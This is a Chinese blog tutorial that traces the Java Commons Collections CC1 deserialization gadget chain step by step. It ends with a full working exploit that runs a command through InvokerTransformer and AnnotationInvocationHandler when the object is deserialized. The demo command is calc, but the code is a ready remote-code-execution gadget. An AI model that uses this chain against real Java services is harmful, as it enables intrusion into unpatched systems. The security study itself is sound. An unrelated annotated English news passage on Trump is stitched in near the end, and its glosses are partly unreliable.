java CC1链跟踪

原创 已于 2025-08-13 17:06:02 修改 · 1.3k 阅读 · 28 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#java #网络安全
于 2024-12-08 00:15:46 首次发布

java CC1链跟踪

跟着jay17佬走一遍CC1链。

jdk旧版本下载:

https://pan.baidu.com/s/10oCMXJdEmYT0nC2_p6h6iA 提取码: 8899

p牛的jdk小版本镜像:

https://hub.docker.com/r/vulhub/java

jdk源码:https://github.com/openjdk/jdk8u/tree/jdk8u121-b13

默认有java基础

文章目录

0. 环境

jdk<8u71,这里采用jdk8u65

maven依赖,pom.xml参考如下,记得reload project

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>com.jk</groupId>
    <artifactId>javaWeb1</artifactId>
    <version>1.0-SNAPSHOT</version>
    <dependencies>
        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.2.1</version>
        </dependency>
        <dependency>
            <groupId>javax.servlet</groupId>
            <artifactId>javax.servlet-api</artifactId>
            <version>3.1.0</version>
            <scope>provided</scope>
        </dependency>
    </dependencies>

    <properties>
        <maven.compiler.source>1.8</maven.compiler.source>
        <maven.compiler.target>1.8</maven.compiler.target>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
    </properties>

</project>

在这里插入图片描述

然后下载一下源代码。

在这里插入图片描述

sun包源码:https://hg.openjdk.org/jdk8u/jdk8u/jdk/rev/af660750b2f4

在这里插入图片描述

下载解压后,找到jdk-af660750b2f4\src\share\classes里面的sun文件夹,将其复制到C:\Program Files\Java\jdk1.8.0_65\src下。

在这里插入图片描述

project structure里把sourcepath加上。

在这里插入图片描述

在porject structure里,修改sdk为1.8_65

在这里插入图片描述

在idea的setting里,右边修改成8

在这里插入图片描述

find usages设置范围:ctrl+alt+shift+F7

1. 流程1/3

整个链子大概这样

AnnotationInvocationHandler.readObject()-->
AbstractInputCheckedMapDecorator.MapEntry.setValue()-->
TransformedMap.checkSetValue()-->
ChainedTransformer.transform()-->
InvokerTransformer.transform()

我们先倒着跟踪InvokerTransformer.transform()

我们可以在左栏找到transformer.class,然后find usages查找transform定义

repository\commons-collections\commons-collections\3.2.1\commons-collections-3.2.1.jar!\org\apache\commons\collections\Transformer.class

public interface Transformer {
    Object transform(Object var1);
}

在这里插入图片描述

找到InvokerTransformer类,该类实现了Transformer接口中的transform方法。此方法接收一个对象,然后反射调用任意类的任意方法(比如没法序列化的Runtime对象)。

在这里插入图片描述

我们尝试用InvokerTransformer类中的transform方法弹个计算器(执行命令calc)。

package com.jk.cc;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import java.io.IOException;
import java.lang.reflect.*;

public class cc1test {
    public static void main(String[] args) throws InvocationTargetException, IllegalAccessException, NoSuchMethodException {
        //正常 调用可命令执行的方法
        //Runtime.getRuntime().exec("calc");

        Runtime cmd = Runtime.getRuntime();
        //使用反射 调用可命令执行的方法
        //Class clazz = Runtime.class;
        //Method cmdMethod = clazz.getMethod("exec", String.class);
        //cmdMethod.invoke(cmd, "calc");

        //InvokerTransformer类 调用可命令执行的方法
        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(cmd);
		//方法名称,参数类型,参数
    }
}

在这里插入图片描述

2. 流程2/3

然后跟踪ChainedTransformer.transform()

Lazymap是国外的,Transformmap是国内的,这里跟踪国内的链子。

在这里插入图片描述

跟踪TransformedMap类,checkSetValue方法调用了valueTransformer.transform()

在这里插入图片描述

往上找,发现了valueTransformer在构造器中初始化。但由于是protected,不能在外部直接调用,所以我们要找TransformedMap类哪个方法调用了构造器。

在这里插入图片描述

TransformedMap类的decorate方法调用了构造器。

在这里插入图片描述

我们对checkSetValue查找一下用法。AbstractInputCheckedMapDecorator类的MapEntry类的setValue()方法调用了checkSetValue方法。

在这里插入图片描述

并且可以注意到AbstractInputCheckedMapDecorator类是Transformedmap的父类。

在这里插入图片描述

加上TransformedMap类 和 AbstractInputCheckedMapDecorator类中的MapEntry类,我们尝试调用计算器。

package com.jk.cc;

import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.util.HashMap;
import java.util.Map;
import java.io.IOException;
import java.lang.reflect.*;

public class cc1test {
    public static void main(String[] args) throws InvocationTargetException, IllegalAccessException, NoSuchMethodException {

        Runtime cmd = Runtime.getRuntime();

        //原本是new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(cmd);
        InvokerTransformer invoker=new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"});


        //Map本来是一个接口,用于存储键值对
        //<键的类型,值的类型>是泛型用法
        //HashMap是Map接口的一个实现类,键值都可null
        //右侧<>是类型推断的语法糖,左侧已经提供类型了,这里不用再次指定
        Map<Object,Object> map1=new HashMap<>();
        map1.put("这是键","这是值");
        //put添加键值对

        Map<Object,Object> transformedMap1 = TransformedMap.decorate(map1, null, invoker);
        //decorate是个静态方法,不用实例化调用
        //decorate调用TransformedMap构造器,初始化了valueTransformer属性
        //构造方法把invoker赋值给TransformedMap.valueTransformer属性

        //AbstractInputCheckedMapDecorator类的MapEntry类的setValue()
        //->TransformedMap.checkSetValue()
        //->valueTransformer.transform()
        for(Map.Entry entry:transformedMap1.entrySet()){
            entry.setValue(cmd);
        }
        //Map的Entry对象由Map.entrySet()产生,所以TransformedMap的Entry对象是由TransformedMap.entrySet()产生
        //相当于invoker.transform(cmd)
    }
}

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

3. 流程3/3

继续倒推,是什么方法调用了AbstractInputCheckedMapDecorator.MapEntry类的setValue()方法呢?

AnnotationInvocationHandler类的readObject函数中以memberValue.setValue()形式调用了AbstractInputCheckedMapDecorator.MapEntry类的setValue()

在这里插入图片描述

AnnotationInvocationHandler类没有被public声明(default类型),仅可在同一个包下可访问也就是在外面无法通过名字来调用,因此只可以用反射获取这个类。

该类的构造方法第一个参数Class类对象必须是注解类或其子类的实例,第二个是Map对象。

注解类得传@Target,因为它有成员变量value(后面会解释)。

在这里插入图片描述

反射获取这个类,初步构造最后EXP

package com.jk.cc;

import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Annotation;
import java.lang.annotation.Target;
import java.util.HashMap;
import java.util.Map;
import java.lang.reflect.*;

public class cc1test {
    public static void main(String[] args) throws Exception {

        Runtime cmd = Runtime.getRuntime();
        InvokerTransformer invoker=new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"});
        Map<Object,Object> map1=new HashMap<>();
        map1.put("这是键","这是值");
        Map<Object,Object> transformedMap1 = TransformedMap.decorate(map1, null, invoker);

        Class ac=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationConstructor= ac.getDeclaredConstructor(Class.class, Map.class);
        annotationConstructor.setAccessible(true);
        Object o = annotationConstructor.newInstance(Target.class, transformedMap1);
        serialize(o);
        unserialize("ser1.bin");
        //反序列化时调用readObject函数

    }
    //序列化方法
    public static void serialize(Object object) throws Exception {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser1.bin"));
        oos.writeObject(object);
    }

    //反序列化方法
    public static void unserialize(String filename) throws Exception {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
        objectInputStream.readObject();
        //会尝试调用被反序列化对象的类中的readObject(ObjectInputStream in)方法
    }
}

在这里插入图片描述

4. 问题解决

下面我们面临三个问题:

  1. AnnotationInvocationHandler类的readObject()方法调用 的setValue()方法的参数不可控。或者说,链子后面调用InvokerTransformer类的transform方法没法直接返回一个Runtime.class对象,得另找一个类可以直接返回Runtime.class对象。

在这里插入图片描述

  1. AnnotationInvocationHandler类的readObject()方法 要是想调用setValue()方法,得绕过两个if判断。

在这里插入图片描述

  1. EXP中Runtime对象cmd因为Runtime类没有继承Serializable接口,不可以被序列化,不过Class类可被序列化。

在这里插入图片描述

1. 问题三解决

先解决第三个问题

通过反射实现Runtime

Class class_rt=Runtime.class;
Method getRuntimeMethod=class_rt.getMethod("getRuntime"); 
Method execMethod=class_rt.getMethod("exec",String.class);//exec参数类型为String
//返回单个公共成员方法对象
Runtime runtimeObject =(Runtime) getRuntimeMethod.invoke(null,null);
//null对象调用getRuntime方法,参数为null,返回一个Object对象,然后转换成Runtime对象
execMethod.invoke(runtimeObject,"calc");
//用runtimeObject对象调用exec方法,参数为calc

利用Invokertransformer和反射可以成功调用Runtime.getRuntime().exec方法 的代码段如下:

//Class clazz = Runtime.class;
//Method getRuntimeMethod = clazz.getMethod("getRuntime", null);
Method getRunmethod = (Method) new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}).transform(Runtime.class);
//方法名,参数类型,参数

//Runtime cmd = (Runtime) getRuntimeMethod.invoke(null, null);
Runtime cmd = (Runtime) new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}).transform(getRunmethod);

//Method cmdMethod = clazz.getMethod("exec", String.class);
//cmdMethod.invoke(cmd, "calc");
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}).transform(cmd);

InvokerTransformer的transform方法如下:

在这里插入图片描述

此时,我们原本的InvokerTransformer实例invoker被拆成了三部分,得想办法整合起来。

注意到org.apache.commons.collections.functors下的ChainedTransformer类的transform方法。该方法可以遍历Transformer数组,调用transform方法

在这里插入图片描述

Transformer[] transformerArray=new Transformer[]{
            new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformerArray);
        chainedTransformer.transform(Runtime.class);
        //相当于先执行Runtime.class.getDeclaredMethod(getRuntime)返回Method getRuntimeMethod1
        //然后getRuntimeMethod1.invoke(null, null)创建对象,返回Object getRuntime1(实际是Runtime类)
        //然后getRuntime1.exec("calc")调用Runtime类的exec方法

在这里插入图片描述

2. 问题二解决

接下来要绕过两个if判断

在这里插入图片描述

目前我们EXP如下:

package com.jk.cc;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Annotation;
import java.lang.annotation.Target;
import java.util.HashMap;
import java.util.Map;
import java.lang.reflect.*;

public class cc1test {
    public static void main(String[] args) throws Exception {
        
        Transformer[] transformerArray=new Transformer[]{
                new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformerArray);

        Map<Object,Object> map1=new HashMap<>();
        map1.put("这是键","这是值");
        Map<Object,Object> transformedMap1 = TransformedMap.decorate(map1, null, chainedTransformer);
        //chainedTransformer取代原本的invoker
        Class ac=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationConstructor= ac.getDeclaredConstructor(Class.class, Map.class);
        annotationConstructor.setAccessible(true);
        Object o = annotationConstructor.newInstance(Target.class, transformedMap1);
        serialize(o);
        unserialize("ser1.bin");
        //反序列化时调用readObject函数

    }
    //序列化方法
    public static void serialize(Object object) throws Exception {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser1.bin"));
        oos.writeObject(object);
    }

    //反序列化方法
    public static void unserialize(String filename) throws Exception {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
        objectInputStream.readObject();
        //会尝试调用被反序列化对象的类中的readObject(ObjectInputStream in)方法
    }
}

下断点调试,memberType(slot_7)null,无法过if判断

在这里插入图片描述

阅读源码可知,memberTypes(slot_2)是获取注解类成员变量的名称,然后检查hashMap键值对中的键是否在memberTypes(slot_2)中。

在这里插入图片描述

可以看到@Target注解类成员变量的名称是value

在这里插入图片描述

故修改EXP中添加Map键值对的部分,成功绕过第一个if

map1.put("value","这是值");

第二个if不用绕过就满足

memberType.isInstance(value) 
//value为String "这是值"
//memberType为class [Ljava.lang.annotation.ElementType
//"这是值"不能强制转换成annotation.ElementType类型
value instanceof ExceptionProxy  
//"这是值"不是ExceptionProxy类

3. 问题一解决

AnnotationInvocationHandler类的readObject()方法调用 的setValue()方法的参数不可控。或者说,链子后面调用InvokerTransformer类的transform方法没法直接返回一个Runtime.class对象,得另找一个类可以直接返回Runtime.class对象。

在这里插入图片描述

我们要想办法使得setValue()方法的参数是Runtime.class

注意到org.apache.commons.collections.functors包下的ConstantTransformer类中的transform函数可返回我们传入的对象

在这里插入图片描述

5. 最终EXP

package com.jk.cc;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Annotation;
import java.lang.annotation.Target;
import java.util.HashMap;
import java.util.Map;
import java.lang.reflect.*;

public class cc1test {
    public static void main(String[] args) throws Exception {

        Transformer[] transformerArray=new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformerArray);

        Map<Object,Object> map1=new HashMap<>();
        map1.put("value","这是值");
        Map<Object,Object> transformedMap1 = TransformedMap.decorate(map1, null, chainedTransformer);
        //chainedTransformer取代原本的invoker
        Class ac=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationConstructor= ac.getDeclaredConstructor(Class.class, Map.class);
        annotationConstructor.setAccessible(true);
        Object o = annotationConstructor.newInstance(Target.class, transformedMap1);
        serialize(o);
        unserialize("ser1.bin");
        //反序列化时调用readObject函数

    }
    //序列化方法
    public static void serialize(Object object) throws Exception {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser1.bin"));
        oos.writeObject(object);
    }

    //反序列化方法
    public static void unserialize(String filename) throws Exception {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
        objectInputStream.readObject();
        //会尝试调用被反序列化对象的类中的readObject(ObjectInputStream in)方法
    }
}

在这里插入图片描述

在这里插入图片描述

While Ms Harris performed well enough with graduates and gullible(易受骗的) celebrities, support for her among those with no degree was a mere 37 percent. She failed also comprehend that voters from ethnic minorities were not automatically hostile to(反对) Mr Trump’s promise to round up(聚集) and deport(丢弃) illegal immigrants en masse(一起).

Yet the maverick streak(特立独行的性格特征) /in Mr Trump /that leaves critics aghast(惊呆的) at his political Lazarus(象征希望,复苏) act /promises upheaval(巨变) /of a potentially more positive kind. His promise to cut taxes and rein in(控制) federal spending represents a return to progressive ideas /buried for a generation, and sadly lacking in Britain.

It is Mr Trump’s infatuation(热恋) with tariffs as a tool to regenerate American industry that is most concerning. He is threatening a 60 per cent rate on imports from China and 20 per cent rate for the rest of the world. Even if enacted(法案通过) only in part(inflated(夸大) threats are part of Mr Trump’s negotiating style) they risk giving the global economy a heart attack.

Most politicians adapt themselves to the political weather. Donald Trump shows he can make it.

–选自泰晤士报

参考

Java反序列化CC1链详解 Jay17

b站零溢出

【心得】javaCC1入门CC个人笔记
uuzeray的博客
01-23 2118
来劲了,感觉离真正的CTF又近了一步。本文仅从一个萌新的角度去谈,如有纰漏,纯属蒟蒻。
Java反序列化-cc1挖掘复现(个人学习笔记)
Rsecret2的博客
06-05 1601
Java反序列化-cc1挖掘复现(个人学习笔记)
java-CC1 条审计
LINGX5的博客
09-18 1228
我过程写的很简洁,因为我们在上帝视角来看这条条,没有真正审计时候的迷茫和一些心理的煎熬。而笔记的主要作用也是帮助我们可以串思路,能够想起这个条的几个转折点够了MapEntry 的 setValue()方法,因为``TransformedMap.decorate()方法获取的对象是Map类,而Map类是的父类,他不能调用子类的checkSetValue()`方法。
java反序列化——CC1
dreamer292的博客
08-27 1891
完整的子追踪起来还是挺复杂的,里面很多地方也都只是浅尝而止,基础还是不牢固反射机制还学的不太明白。 等多看几条子就老实了。。。
java反序列化:CC1深度剖析
spinage的博客
07-16 1518
CC1Java反序列化漏洞的经典利用,由Apache Commons Collections库的缺陷引发。该漏洞影响Commons Collections ≤3.2.1Java ≤8u71版本,主要利用AnnotationInvocationHandler作为入口点,通过LazyMap.get()触发ChainedTransformer执行,最终实现任意命令执行。核心组件包括InvokerTransformer(反射执行)、ChainedTransformer(式调用)和动态代理机制。完整利用
java反序列化CC6
google20的博客
08-12 445
java反序列化CC6,条件断点
Java代码审计&Shiro反序列化&CB1&source入口&sink执行&gadget
qq_46081990的博客
01-22 2869
本文详细介绍了Shiro550 Commons BeanUtils反序列化利用,以代码审计的角度跟踪分析Commons BeanUtils的source、sink以及gadget,解释了该触发反序列化漏洞并最终造成RCE命令执行的根本原因是什么,并且在最后深入分析了Commons BeanUtilspayload的生成逻辑。
Java反序列化(二)——URLDNSCC1
Xzy03210321的博客
08-13 1874
MapEntry这一种类来说,当Map遍历Entry(一个键值对)时,其底层就会将Map封装进MapEntry中,所以只需要遍历TransformedMap的Entry,并在遍历的过程中调用setValue,就能进入TransformedMap.checkSetValue(Object)中。而在遍历时,利用的是第一个参数Map,所以需要put个键值对进去,这样在遍历是才会非空,进入循环的逻辑里。
Java反序列化-CC1(TransformedMap)
you_possible的博客
02-27 635
涉及到Java反序列化CC1的环境搭建以及详细的验证过程。
CC1分析
a877558888的博客
06-01 889
CC1分析
Java安全-CC | CC3
2501_93871563的博客
05-11 3211
所以这里直接给 _tfactory 赋值成 TransformerFactoryImpl 即可。
Java反序列化漏洞实战:从URLDNS探测到CC利用
weixin_30432579的博客
06-17 354
Java反序列化是Java安全领域的核心概念,其原理在于对象序列化机制允许将对象状态转换为字节流进行传输或存储,而反序列化过程通过自动调用对象的readObject方法恢复对象状态。这一机制的技术价值在于提供了对象持久化和网络通信的便利,但也引入了安全风险,因为攻击者可以构造恶意字节流,在反序列化时触发利用(Gadget Chain),最终实现远程代码执行(RCE)。在应用场景上,反序列化漏洞常见于Web应用、RMI协议以及Shiro、Fastjson等组件中,成为渗透测试和CTF比赛的高频考点。本文以C
Java反序列化漏洞剖析:Apache Commons Collections利用CC1原理与实战
最新发布
weixin_30530939的博客
06-26 383
Java反序列化是一种将字节流恢复为对象的核心机制,其原理在于反序列化过程中会自动调用对象的readObject方法。这一特性在带来便利的同时,也引入了严重的安全风险,攻击者通过控制反序列化数据,可触发恶意逻辑执行。其技术价值在于揭示了通用库中灵活组件组合可能引发的远程代码执行(RCE)漏洞,广泛应用于Web应用、中间件等场景。本文聚焦于Apache Commons Collections库中的经典利用CC1,深入拆解其如何通过Transformer与动态代理机制,在特定条件下实现命令执行,并融入反序列
CommonsCollections CC3
jy13172的博客
07-22 1125
java反序列化
Java反序列化漏洞深度解析:CC6利用原理、构造与实战防御
chouxuyi9789的博客
06-25 404
Java反序列化漏洞是Web安全领域的一个核心威胁,其根源在于ObjectInputStream.readObject()方法在还原对象时,会自动调用对象类的特定方法,从而可能触发一系列危险的连锁反应。攻击者通过精心构造的序列化数据,可以引导程序在执行反序列化过程中执行任意代码,实现远程命令执行等高危操作。Apache Commons Collections库中Transformer接口的设计,特别是InvokerTransformer能够通过反射调用任意方法的特性,为这类漏洞提供了关键的“武器化”组件。在
Java反序列化漏洞CC4原理与实战:从TransformingComparator到命令执行
weixin_30823001的博客
06-17 342
Java反序列化漏洞是安全领域的核心议题,其本质在于攻击者通过精心构造的序列化数据,在目标系统反序列化过程中控制程序执行流。这类漏洞通常利用Java对象序列化机制与特定类库(如Apache Commons Collections)中可被串联的回调方法,形成完整的攻击(Gadget Chain)。其技术价值在于能够绕过常规安全边界,实现远程代码执行(RCE),对Web应用、中间件等构成严重威胁。在众多利用中,CC家族因其在Apache Commons Collections库中的广泛存在而备受关注。针对
Java代码审计&原生反序列化&CC跟踪分析
qq_46081990的博客
01-24 2052
观察到decorate方法调用过该构造方法TransformedMap,由此想到可以利用decorate方法间接控制valueTransformer,即控制decorate方法的传参valueTransformer=new InvokerTransformer(),那么执行decorate方法就会触发构造方法设置valueTransformer为InvokerTransformer类对象。总结:无非就是让前面调用方法的类发生更改,控制其等于后面的类,让其调用后面类的方法。
CC1_TransformedMap
2401_87679341的博客
05-16 230
CC1_TransformedMap学习路径与深度思考
JAVA攻防-Shiro专题&key利用&CB1分析&入口点&调用&执行地&Class加载
SuperherRo的博客
01-14 205
知识点: Java攻防-Shiro反序列化-CB1分析
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cllsse

富✌您吉祥

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值